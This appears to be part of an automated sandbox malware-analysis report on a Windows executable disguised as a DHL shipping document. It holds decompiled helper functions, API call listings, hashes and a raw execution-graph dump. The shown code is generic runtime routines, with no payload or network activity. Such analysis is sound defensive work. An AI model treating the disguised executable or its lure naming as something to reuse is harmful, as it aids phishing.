                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: Window$CallMessageProcSendVisible
                                                              • String ID:
                                                              • API String ID: 3748168415-3916222277
                                                              • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                              • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                              • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                              • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}





                                                              0x00405f84
                                                              0x00405f8e
                                                              0x00405f91
                                                              0x00405f97
                                                              0x00405f98
                                                              0x00405f99
                                                              0x00405fa1
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00405fa1
                                                              0x00405fa3
                                                              0x00405fab

                                                              APIs
                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 00405F89
                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,C:\Users\user\Desktop\DHL_SHIPPING_DOCUMENT.exe,80000000,00000003), ref: 00405F99
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: CharPrevlstrlen
                                                              • String ID: C:\Users\user\Desktop
                                                              • API String ID: 2709904686-224404859
                                                              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                              • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                              • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                              0x004060cd
                                                              0x004060cf
                                                              0x004060d2
                                                              0x004060fe
                                                              0x004060d7
                                                              0x004060e0
                                                              0x004060e5
                                                              0x004060f0
                                                              0x004060f3
                                                              0x0040610f
                                                              0x004060f5
                                                              0x004060fc
                                                              0x00000000
                                                              0x004060fc
                                                              0x00406108
                                                              0x0040610c
                                                              0x0040610c
                                                              0x00406106
                                                              0x00000000

                                                              APIs
                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                              • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E5
                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.325407828.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.325399231.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325416433.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325422590.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.000000000047D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.325474974.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_DHL_SHIPPING_DOCUMENT.jbxd
                                                              Similarity
                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                              • String ID:
                                                              • API String ID: 190613189-0
                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:7.9%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0.8%
                                                              Total number of Nodes:1693
                                                              Total number of Limit Nodes:37
                                                              execution_graph 11014 40b0c1 11015 40b0f8 11014->11015 11016 40b0da 11014->11016 11016->11015 11017 407a41 44 API calls 11016->11017 11018 407991 2 API calls 11016->11018 11017->11016 11018->11016 10100 403d54 10103 402081 10100->10103 10104 402093 10103->10104 10105 4020a5 10103->10105 10104->10105 10108 40209b 10104->10108 10117 402403 10105->10117 10107 4020a3 10108->10107 10110 402403 __CreateFrameInfo 49 API calls 10108->10110 10111 4020c3 10110->10111 10113 402403 __CreateFrameInfo 49 API calls 10111->10113 10112 402403 __CreateFrameInfo 49 API calls 10112->10107 10114 4020ce 10113->10114 10131 406182 10114->10131 10137 402411 10117->10137 10119 402408 10120 4020aa 10119->10120 10151 40b2c7 10119->10151 10120->10107 10120->10112 10123 40624e 10125 406258 IsProcessorFeaturePresent 10123->10125 10126 406277 10123->10126 10127 406264 10125->10127 10128 4059b6 __CreateFrameInfo 21 API calls 10126->10128 10129 40636b __CreateFrameInfo 8 API calls 10127->10129 10130 406281 10128->10130 10129->10126 10132 40618e __FrameHandler3::FrameUnwindToState 10131->10132 10133 406c70 _unexpected 39 API calls 10132->10133 10134 406193 10133->10134 10135 40623e CallUnexpected 39 API calls 10134->10135 10136 4061bd 10135->10136 10138 40241a 10137->10138 10139 40241d GetLastError 10137->10139 10138->10119 10181 4026f4 10139->10181 10142 402497 SetLastError 10142->10119 10143 40272f ___vcrt_FlsSetValue 6 API calls 10144 40244b __CreateFrameInfo 10143->10144 10145 402473 10144->10145 10146 40272f ___vcrt_FlsSetValue 6 API calls 10144->10146 10150 402451 10144->10150 10147 40272f ___vcrt_FlsSetValue 6 API calls 10145->10147 10148 402487 10145->10148 10146->10145 10147->10148 10186 4061be 10148->10186 10150->10142 10189 40b1f5 10151->10189 10154 40b30c 10155 40b318 __FrameHandler3::FrameUnwindToState 10154->10155 10156 406dc1 __dosmaperr 14 API calls 10155->10156 10157 40b368 10155->10157 10159 40b37a __CreateFrameInfo 10155->10159 10163 40b349 __CreateFrameInfo 10155->10163 10156->10163 10158 407b6a __dosmaperr 14 API calls 10157->10158 10161 40b36d 10158->10161 10160 40b3b0 __CreateFrameInfo 10159->10160 10200 409f3e EnterCriticalSection 10159->10200 10166 40b4ea 10160->10166 10167 40b3ed 10160->10167 10177 40b41b 10160->10177 10164 406567 __fread_nolock 39 API calls 10161->10164 10163->10157 10163->10159 10180 40b352 10163->10180 10164->10180 10168 40b4f5 10166->10168 10205 409f86 LeaveCriticalSection 10166->10205 10173 406c70 _unexpected 39 API calls 10167->10173 10167->10177 10171 4059b6 __CreateFrameInfo 21 API calls 10168->10171 10172 40b4fd 10171->10172 10175 40b410 10173->10175 10174 406c70 _unexpected 39 API calls 10178 40b470 10174->10178 10176 406c70 _unexpected 39 API calls 10175->10176 10176->10177 10201 40b496 10177->10201 10179 406c70 _unexpected 39 API calls 10178->10179 10178->10180 10179->10180 10180->10123 10182 402593 ___vcrt_FlsFree 5 API calls 10181->10182 10183 40270e 10182->10183 10184 402726 TlsGetValue 10183->10184 10185 402432 10183->10185 10184->10185 10185->10142 10185->10143 10185->10150 10187 408694 __freea 14 API calls 10186->10187 10188 4061d6 10187->10188 10188->10150 10190 40b201 __FrameHandler3::FrameUnwindToState 10189->10190 10195 409f3e EnterCriticalSection 10190->10195 10192 40b20f 10196 40b251 10192->10196 10195->10192 10199 409f86 LeaveCriticalSection 10196->10199 10198 406243 10198->10123 10198->10154 10199->10198 10200->10160 10202 40b462 10201->10202 10203 40b49a 10201->10203 10202->10174 10202->10178 10202->10180 10206 409f86 LeaveCriticalSection 10203->10206 10205->10168 10206->10202 11053 4011db 11054 4011e3 11053->11054 11070 405a35 11054->11070 11056 4011ee 11077 4014db 11056->11077 11058 401796 4 API calls 11059 401285 11058->11059 11060 401203 __RTC_Initialize 11068 401260 11060->11068 11083 401668 11060->11083 11062 40121c 11062->11068 11086 401722 InitializeSListHead 11062->11086 11064 401232 11087 401731 11064->11087 11066 401255 11093 405c06 11066->11093 11068->11058 11069 40127d 11068->11069 11071 405a44 11070->11071 11072 405a67 11070->11072 11071->11072 11073 407b6a __dosmaperr 14 API calls 11071->11073 11072->11056 11074 405a57 11073->11074 11075 406567 __fread_nolock 39 API calls 11074->11075 11076 405a62 11075->11076 11076->11056 11078 4014e7 11077->11078 11079 4014eb 11077->11079 11078->11060 11080 401796 4 API calls 11079->11080 11082 4014f8 ___scrt_release_startup_lock 11079->11082 11081 401561 11080->11081 11082->11060 11100 40163b 11083->11100 11086->11064 11135 406123 11087->11135 11089 401742 11090 401749 11089->11090 11091 401796 4 API calls 11089->11091 11090->11066 11092 401751 11091->11092 11094 406c70 _unexpected 39 API calls 11093->11094 11095 405c11 11094->11095 11096 407b6a __dosmaperr 14 API calls 11095->11096 11099 405c49 11095->11099 11097 405c3e 11096->11097 11098 406567 __fread_nolock 39 API calls 11097->11098 11098->11099 11099->11068 11101 401651 11100->11101 11102 40164a 11100->11102 11109 405fb3 11101->11109 11106 405f36 11102->11106 11105 40164f 11105->11062 11107 405fb3 42 API calls 11106->11107 11108 405f48 11107->11108 11108->11105 11112 405cff 11109->11112 11113 405d0b __FrameHandler3::FrameUnwindToState 11112->11113 11120 409f3e EnterCriticalSection 11113->11120 11115 405d19 11121 405d5a 11115->11121 11117 405d26 11131 405d4e 11117->11131 11120->11115 11122 405d75 11121->11122 11123 405de8 __dosmaperr 11121->11123 11122->11123 11124 405dc8 11122->11124 11125 40b042 42 API calls 11122->11125 11123->11117 11124->11123 11126 40b042 42 API calls 11124->11126 11127 405dbe 11125->11127 11128 405dde 11126->11128 11129 408694 __freea 14 API calls 11127->11129 11130 408694 __freea 14 API calls 11128->11130 11129->11124 11130->11123 11134 409f86 LeaveCriticalSection 11131->11134 11133 405d37 11133->11105 11134->11133 11136 406141 11135->11136 11140 406161 11135->11140 11137 407b6a __dosmaperr 14 API calls 11136->11137 11138 406157 11137->11138 11139 406567 __fread_nolock 39 API calls 11138->11139 11139->11140 11140->11089 11153 405bdf 11156 405b66 11153->11156 11157 405b72 __FrameHandler3::FrameUnwindToState 11156->11157 11164 409f3e EnterCriticalSection 11157->11164 11159 405b7c 11160 405baa 11159->11160 11163 40ab5c __wsopen_s 14 API calls 11159->11163 11165 405bc8 11160->11165 11163->11159 11164->11159 11168 409f86 LeaveCriticalSection 11165->11168 11167 405bb6 11168->11167 9670 407f0d 9675 407ce3 9670->9675 9673 407f4c 9676 407d02 9675->9676 9677 407d15 9676->9677 9686 407d2a 9676->9686 9678 407b6a __dosmaperr 14 API calls 9677->9678 9679 407d1a 9678->9679 9680 406567 __fread_nolock 39 API calls 9679->9680 9682 407d25 9680->9682 9681 407e4a 9681->9682 9683 407b6a __dosmaperr 14 API calls 9681->9683 9682->9673 9692 40c397 9682->9692 9684 407efb 9683->9684 9685 406567 __fread_nolock 39 API calls 9684->9685 9685->9682 9686->9681 9695 40bc07 9686->9695 9688 407e9a 9688->9681 9689 40bc07 39 API calls 9688->9689 9690 407eb8 9689->9690 9690->9681 9691 40bc07 39 API calls 9690->9691 9691->9681 9727 40bd3f 9692->9727 9696 40bc16 9695->9696 9697 40bc5e 9695->9697 9699 40bc1c 9696->9699 9700 40bc39 9696->9700 9709 40bc74 9697->9709 9702 407b6a __dosmaperr 14 API calls 9699->9702 9704 407b6a __dosmaperr 14 API calls 9700->9704 9708 40bc57 9700->9708 9701 40bc2c 9701->9688 9703 40bc21 9702->9703 9705 406567 __fread_nolock 39 API calls 9703->9705 9706 40bc48 9704->9706 9705->9701 9707 406567 __fread_nolock 39 API calls 9706->9707 9707->9701 9708->9688 9710 40bc84 9709->9710 9711 40bc9e 9709->9711 9712 407b6a __dosmaperr 14 API calls 9710->9712 9713 40bca6 9711->9713 9714 40bcbd 9711->9714 9717 40bc89 9712->9717 9718 407b6a __dosmaperr 14 API calls 9713->9718 9715 40bce0 9714->9715 9716 40bcc9 9714->9716 9723 4080af __wsopen_s 39 API calls 9715->9723 9726 40bc94 9715->9726 9719 407b6a __dosmaperr 14 API calls 9716->9719 9720 406567 __fread_nolock 39 API calls 9717->9720 9721 40bcab 9718->9721 9722 40bcce 9719->9722 9720->9726 9724 406567 __fread_nolock 39 API calls 9721->9724 9725 406567 __fread_nolock 39 API calls 9722->9725 9723->9726 9724->9726 9725->9726 9726->9701 9730 40bd4b __FrameHandler3::FrameUnwindToState 9727->9730 9728 40bd52 9729 407b6a __dosmaperr 14 API calls 9728->9729 9731 40bd57 9729->9731 9730->9728 9732 40bd7d 9730->9732 9733 406567 __fread_nolock 39 API calls 9731->9733 9738 40c329 9732->9738 9735 40bd61 9733->9735 9735->9673 9751 408d77 9738->9751 9744 40c35f 9745 40bda1 9744->9745 9746 408694 __freea 14 API calls 9744->9746 9747 40bdd4 9745->9747 9746->9745 9748 40be18 9747->9748 9749 40bdda 9747->9749 9748->9735 10012 40a1ec LeaveCriticalSection 9749->10012 9752 4080af __wsopen_s 39 API calls 9751->9752 9753 408d89 9752->9753 9754 408d9b 9753->9754 9806 40ada4 9753->9806 9756 40885e 9754->9756 9812 4086e6 9756->9812 9759 40c3b7 9842 40c105 9759->9842 9762 40c402 9860 40a20f 9762->9860 9763 40c3e9 9765 407b57 __dosmaperr 14 API calls 9763->9765 9766 40c3ee 9765->9766 9770 407b6a __dosmaperr 14 API calls 9766->9770 9768 40c410 9771 407b57 __dosmaperr 14 API calls 9768->9771 9769 40c427 9873 40c070 CreateFileW 9769->9873 9796 40c3fb 9770->9796 9773 40c415 9771->9773 9774 407b6a __dosmaperr 14 API calls 9773->9774 9774->9766 9775 40c4dd GetFileType 9777 40c4e8 GetLastError 9775->9777 9778 40c52f 9775->9778 9776 40c4b2 GetLastError 9780 407b10 __dosmaperr 14 API calls 9776->9780 9781 407b10 __dosmaperr 14 API calls 9777->9781 9875 40a15a 9778->9875 9779 40c460 9779->9775 9779->9776 9874 40c070 CreateFileW 9779->9874 9780->9766 9783 40c4f6 CloseHandle 9781->9783 9783->9766 9786 40c51f 9783->9786 9785 40c4a5 9785->9775 9785->9776 9788 407b6a __dosmaperr 14 API calls 9786->9788 9789 40c524 9788->9789 9789->9766 9792 40c59c 9794 40c5a3 9792->9794 9905 40be1a 9792->9905 9899 40e6a0 9794->9899 9795 40c5df 9795->9796 9798 40c65b CloseHandle 9795->9798 9796->9744 9932 40c070 CreateFileW 9798->9932 9800 40c686 9801 40c690 GetLastError 9800->9801 9802 40c6bc 9800->9802 9803 407b10 __dosmaperr 14 API calls 9801->9803 9802->9796 9804 40c69c 9803->9804 9933 40a322 9804->9933 9809 40abac 9806->9809 9810 40acdf __dosmaperr 5 API calls 9809->9810 9811 40abc2 9810->9811 9811->9754 9813 4086f4 9812->9813 9814 40870e 9812->9814 9830 408db6 9813->9830 9815 408734 9814->9815 9816 408715 9814->9816 9818 409976 __fread_nolock MultiByteToWideChar 9815->9818 9829 4086fe 9816->9829 9834 408e0c 9816->9834 9820 408743 9818->9820 9821 40874a GetLastError 9820->9821 9822 408770 9820->9822 9824 408e0c __wsopen_s 15 API calls 9820->9824 9823 407b10 __dosmaperr 14 API calls 9821->9823 9825 409976 __fread_nolock MultiByteToWideChar 9822->9825 9822->9829 9826 408756 9823->9826 9824->9822 9827 408787 9825->9827 9828 407b6a __dosmaperr 14 API calls 9826->9828 9827->9821 9827->9829 9828->9829 9829->9744 9829->9759 9831 408dc1 9830->9831 9832 408dc9 9830->9832 9833 408694 __freea 14 API calls 9831->9833 9832->9829 9833->9832 9835 408db6 __wsopen_s 14 API calls 9834->9835 9836 408e1a 9835->9836 9839 408e4b 9836->9839 9840 40a6a3 __fread_nolock 15 API calls 9839->9840 9841 408e2b 9840->9841 9841->9829 9843 40c140 9842->9843 9845 40c126 9842->9845 9942 40c095 9843->9942 9845->9843 9846 407b6a __dosmaperr 14 API calls 9845->9846 9847 40c135 9846->9847 9848 406567 __fread_nolock 39 API calls 9847->9848 9848->9843 9849 40c178 9850 40c1a7 9849->9850 9852 407b6a __dosmaperr 14 API calls 9849->9852 9858 40c1fa 9850->9858 9949 405a08 9850->9949 9854 40c19c 9852->9854 9853 40c1f5 9855 40c272 9853->9855 9853->9858 9856 406567 __fread_nolock 39 API calls 9854->9856 9857 406577 __fread_nolock 11 API calls 9855->9857 9856->9850 9859 40c27e 9857->9859 9858->9762 9858->9763 9861 40a21b __FrameHandler3::FrameUnwindToState 9860->9861 9956 409f3e EnterCriticalSection 9861->9956 9863 40a247 9866 409fe9 __wsopen_s 15 API calls 9863->9866 9864 40a222 9864->9863 9869 40a2b6 EnterCriticalSection 9864->9869 9871 40a269 9864->9871 9868 40a24c 9866->9868 9868->9871 9960 40a137 EnterCriticalSection 9868->9960 9870 40a2c3 LeaveCriticalSection 9869->9870 9869->9871 9870->9864 9957 40a319 9871->9957 9873->9779 9874->9785 9876 40a1d2 9875->9876 9877 40a169 9875->9877 9878 407b6a __dosmaperr 14 API calls 9876->9878 9877->9876 9883 40a18f __wsopen_s 9877->9883 9879 40a1d7 9878->9879 9880 407b57 __dosmaperr 14 API calls 9879->9880 9881 40a1bf 9880->9881 9881->9792 9884 40c27f 9881->9884 9882 40a1b9 SetStdHandle 9882->9881 9883->9881 9883->9882 9885 40c2d9 9884->9885 9886 40c2a7 9884->9886 9885->9792 9886->9885 9887 4068d4 __fread_nolock 41 API calls 9886->9887 9888 40c2b7 9887->9888 9889 40c2c7 9888->9889 9890 40c2dd 9888->9890 9891 407b57 __dosmaperr 14 API calls 9889->9891 9892 407550 __fread_nolock 51 API calls 9890->9892 9893 40c2cc 9891->9893 9894 40c2ef 9892->9894 9893->9885 9897 407b6a __dosmaperr 14 API calls 9893->9897 9895 40c305 9894->9895 9962 40e39e 9894->9962 9895->9893 9896 4068d4 __fread_nolock 41 API calls 9895->9896 9896->9893 9897->9885 9900 40e6b3 __fread_nolock 9899->9900 9993 40e6d0 9900->9993 9902 40e6bf 9903 4042bb __fread_nolock 39 API calls 9902->9903 9904 40e6cb 9903->9904 9904->9796 9906 40be4b 9905->9906 9907 40bf35 9905->9907 9908 405a08 __wsopen_s 39 API calls 9906->9908 9915 40be6b 9906->9915 9907->9794 9907->9795 9909 40be62 9908->9909 9910 40c065 9909->9910 9909->9915 9911 406577 __fread_nolock 11 API calls 9910->9911 9912 40c06f 9911->9912 9913 40bf5b 9913->9907 9914 407550 __fread_nolock 51 API calls 9913->9914 9918 40bf65 9913->9918 9922 40bf8b 9914->9922 9915->9907 9915->9913 9916 4068d4 __fread_nolock 41 API calls 9915->9916 9917 40bf2c 9915->9917 9919 40bf45 9916->9919 9917->9907 9917->9918 10006 40cfa2 9917->10006 9918->9907 9926 407b6a __dosmaperr 14 API calls 9918->9926 9919->9917 9925 40bf50 9919->9925 9921 40bff6 9930 4068d4 __fread_nolock 41 API calls 9921->9930 9922->9907 9922->9918 9922->9921 9923 40bfd0 9922->9923 9924 40bfc3 9922->9924 9923->9921 9929 40bfd8 9923->9929 9927 407b6a __dosmaperr 14 API calls 9924->9927 9928 4068d4 __fread_nolock 41 API calls 9925->9928 9926->9907 9927->9918 9928->9913 9931 4068d4 __fread_nolock 41 API calls 9929->9931 9930->9918 9931->9918 9932->9800 9934 40a331 9933->9934 9935 40a398 9933->9935 9934->9935 9941 40a35b __wsopen_s 9934->9941 9936 407b6a __dosmaperr 14 API calls 9935->9936 9937 40a39d 9936->9937 9938 407b57 __dosmaperr 14 API calls 9937->9938 9939 40a388 9938->9939 9939->9802 9940 40a382 SetStdHandle 9940->9939 9941->9939 9941->9940 9944 40c0ad 9942->9944 9943 40c0c8 9943->9849 9944->9943 9945 407b6a __dosmaperr 14 API calls 9944->9945 9946 40c0ec 9945->9946 9947 406567 __fread_nolock 39 API calls 9946->9947 9948 40c0f7 9947->9948 9948->9849 9950 405a14 9949->9950 9951 405a29 9949->9951 9952 407b6a __dosmaperr 14 API calls 9950->9952 9951->9853 9953 405a19 9952->9953 9954 406567 __fread_nolock 39 API calls 9953->9954 9955 405a24 9954->9955 9955->9853 9956->9864 9961 409f86 LeaveCriticalSection 9957->9961 9959 40a289 9959->9768 9959->9769 9960->9871 9961->9959 9963 40e3b1 __fread_nolock 9962->9963 9968 40e3d5 9963->9968 9966 4042bb __fread_nolock 39 API calls 9967 40e3d0 9966->9967 9967->9895 9988 40e351 9968->9988 9971 40e4ef 9974 4068d4 __fread_nolock 41 API calls 9971->9974 9982 40e4b8 9971->9982 9972 40e431 9975 408637 __dosmaperr 14 API calls 9972->9975 9973 4068d4 __fread_nolock 41 API calls 9976 40e3c3 9973->9976 9977 40e507 9974->9977 9985 40e43d __wsopen_s 9975->9985 9976->9966 9978 40a3b3 __wsopen_s 39 API calls 9977->9978 9977->9982 9979 40e51f SetEndOfFile 9978->9979 9981 40e52b GetLastError 9979->9981 9979->9982 9980 408694 __freea 14 API calls 9980->9982 9981->9982 9982->9973 9983 40d0ea __wsopen_s 62 API calls 9983->9985 9984 40e445 9984->9980 9985->9983 9985->9984 9986 40e4a9 __wsopen_s 9985->9986 9987 408694 __freea 14 API calls 9986->9987 9987->9982 9989 4068d4 __fread_nolock 41 API calls 9988->9989 9990 40e36a 9989->9990 9991 4068d4 __fread_nolock 41 API calls 9990->9991 9992 40e379 9991->9992 9992->9971 9992->9972 9992->9982 9994 40a3b3 __wsopen_s 39 API calls 9993->9994 9997 40e6e0 9994->9997 9995 40e6e6 9996 40a322 __wsopen_s 15 API calls 9995->9996 10003 40e73e __wsopen_s 9996->10003 9997->9995 9999 40a3b3 __wsopen_s 39 API calls 9997->9999 10005 40e718 9997->10005 9998 40a3b3 __wsopen_s 39 API calls 10000 40e724 CloseHandle 9998->10000 10001 40e70f 9999->10001 10000->9995 10002 40e730 GetLastError 10000->10002 10004 40a3b3 __wsopen_s 39 API calls 10001->10004 10002->9995 10003->9902 10004->10005 10005->9995 10005->9998 10007 40cfb5 __fread_nolock 10006->10007 10008 40cfd9 __wsopen_s 64 API calls 10007->10008 10009 40cfc7 10008->10009 10010 4042bb __fread_nolock 39 API calls 10009->10010 10011 40cfd4 10010->10011 10011->9917 10012->9748 10073 40128e 10078 4018f8 SetUnhandledExceptionFilter 10073->10078 10075 401293 10079 405c6f 10075->10079 10077 40129e 10078->10075 10080 405c95 10079->10080 10081 405c7b 10079->10081 10080->10077 10081->10080 10082 407b6a __dosmaperr 14 API calls 10081->10082 10083 405c85 10082->10083 10084 406567 __fread_nolock 39 API calls 10083->10084 10085 405c90 10084->10085 10085->10077 11240 40669a 11250 408494 11240->11250 11244 4066a7 11263 40bb22 11244->11263 11247 4066d1 11248 408694 __freea 14 API calls 11247->11248 11249 4066dc 11248->11249 11267 408325 11250->11267 11253 40ba77 11254 40ba83 __FrameHandler3::FrameUnwindToState 11253->11254 11338 409f3e EnterCriticalSection 11254->11338 11256 40bafa 11345 40bb19 11256->11345 11258 40ba8e 11258->11256 11260 40bace DeleteCriticalSection 11258->11260 11339 40e2b6 11258->11339 11262 408694 __freea 14 API calls 11260->11262 11262->11258 11264 40bb39 11263->11264 11266 4066b6 DeleteCriticalSection 11263->11266 11265 408694 __freea 14 API calls 11264->11265 11264->11266 11265->11266 11266->11244 11266->11247 11270 408279 11267->11270 11271 408285 __FrameHandler3::FrameUnwindToState 11270->11271 11278 409f3e EnterCriticalSection 11271->11278 11273 4082fb 11287 408319 11273->11287 11276 40828f ___scrt_uninitialize_crt 11276->11273 11279 4081ed 11276->11279 11278->11276 11280 4081f9 __FrameHandler3::FrameUnwindToState 11279->11280 11290 4066e6 EnterCriticalSection 11280->11290 11282 408203 ___scrt_uninitialize_crt 11283 40823c 11282->11283 11291 40842f 11282->11291 11304 40826d 11283->11304 11337 409f86 LeaveCriticalSection 11287->11337 11289 4066a2 11289->11253 11290->11282 11292 408444 __fread_nolock 11291->11292 11293 408456 11292->11293 11294 40844b 11292->11294 11296 4083c6 ___scrt_uninitialize_crt 64 API calls 11293->11296 11295 408325 ___scrt_uninitialize_crt 68 API calls 11294->11295 11298 408451 11295->11298 11297 408460 11296->11297 11297->11298 11300 4065ab __fread_nolock 39 API calls 11297->11300 11299 4042bb __fread_nolock 39 API calls 11298->11299 11301 40848e 11299->11301 11302 408477 11300->11302 11301->11283 11307 40c783 11302->11307 11336 4066fa LeaveCriticalSection 11304->11336 11306 40825b 11306->11276 11308 40c794 11307->11308 11311 40c7a1 11307->11311 11309 407b6a __dosmaperr 14 API calls 11308->11309 11313 